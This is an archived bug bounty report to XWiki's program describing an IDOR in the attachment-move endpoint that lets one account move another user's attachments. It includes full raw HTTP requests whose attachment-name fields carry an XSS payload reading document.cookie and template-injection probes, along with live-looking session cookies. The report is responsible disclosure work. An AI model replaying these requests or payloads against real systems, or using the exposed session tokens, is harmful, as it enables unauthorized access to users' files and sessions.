Move documents from victim profile to attacker profile

SUBMISSION REFERENCES

• Submission code: XWIKI-WT6D3WYY
• Submission URL: https://www.intigriti.com/auth/dashboard?redirect=/submissions/e95a7ad5-7029-4627-abf0-3e3e3ea0b4ce/XWIKI-WT6D3WYY

RESEARCHER INFORMATION

• Submitter: bruhbey

SUBMISSION INFORMATION

• Created at: Thu, 03 Nov 2022 07:44:56 GMT
• Submission status: Archived

REPORT CONTENT

• Severity: High (8.1)
• Domain: https://intigriti.xwiki.com/ (Url)
• Proof of concept: Hey

Summary:

• IDOR on move documents

Steps:

• create 2 accounts
• login your first account,go to your profile and upload an attachment
• then go to your second account and upload an attachment
• try to move your attachment (from second account)

first request :

GET /xwiki/bin/view/XWiki/bruhboyi?xpage=attachment%2Fmove&attachment=xwiki%3AXWiki.bruhboyi%40%24%7B2*2%7D%24%7B%7B2*2%7D%7D%7B2*2%7D%7B%7B2*2%7D%7D%3Cimg%20src%3DA%20onerror%3Dalert%28document.cookie%29%3E.pdf HTTP/1.1
Host: intigriti.xwiki.com
Connection: close
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="100", "Google Chrome";v="100"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Linux"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.75 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: https://intigriti.xwiki.com/xwiki/bin/view/XWiki/bruhboyi
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: JSESSIONID=F1F2C6CBB4D4E0FAB1C64749BB732229; username="9c0MhyM7A8TTVVq3M3evqg_"; password="3zG4GTGXE6KBpi89DD8rzA_"; rememberme="false"; validation="71a1f21d8049f98419c88f6fc42fd5b5"

• you have to change attachment parameter

Second request :

POST /xwiki/bin/view/XWiki/bruhboyi?xpage=attachment/move&step=2 HTTP/1.1
Host: intigriti.xwiki.com
Connection: close
Content-Length: 444
Cache-Control: max-age=0
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="100", "Google Chrome";v="100"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Linux"
Upgrade-Insecure-Requests: 1
Origin: https://intigriti.xwiki.com
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.75 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: https://intigriti.xwiki.com/xwiki/bin/view/XWiki/bruhboyi?xpage=attachment%2Fmove&attachment=xwiki%3AXWiki.bruhboyi%40%24%7B2*2%7D%24%7B%7B2*2%7D%7D%7B2*2%7D%7B%7B2*2%7D%7D%3Cimg%20src%3DA%20onerror%3Dalert%28document.cookie%29%3E.pdf
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: JSESSIONID=F1F2C6CBB4D4E0FAB1C64749BB732229; username="9c0MhyM7A8TTVVq3M3evqg_"; password="3zG4GTGXE6KBpi89DD8rzA_"; rememberme="false"; validation="71a1f21d8049f98419c88f6fc42fd5b5"

form_token=wkm7S5aStrzL0zJFDbt1YA&async=true&sourceLocation=xwiki%3AXWiki.bruhboyi&sourceAttachmentName=%24%7B2*2%7D%24%7B%7B2*2%7D%7D%7B2*2%7D%7B%7B2*2%7D%7D%3Cimg+src%3DA+onerror%3Dalert%28document.cookie%29%3E.pdf&updateReferences=true&updateReferences=false&autoRedirect=false&targetAttachmentName=%24%7B2*2%7D%24%7B%7B2*2%7D%7D%7B2*2%7D%7B%7B2*2%7D%7D%3Cimg+src%3DA+onerror%3Dalert%28document.cookie%29%3E.pdf&targetLocation=XWiki.bruhboyi

• you can simply change sourceLocation and sourceAttachmentName to reproduce issue

I added poc video

Thanks

• Impact: IDOR
• Personal data involved: No
• Endpoint: https://intigriti.xwiki.com/xwiki/bin/view/XWiki/<username>?xpage=attachment/move&step=2
• Type: Insecure Direct Object Reference
• Attachments: No attachments available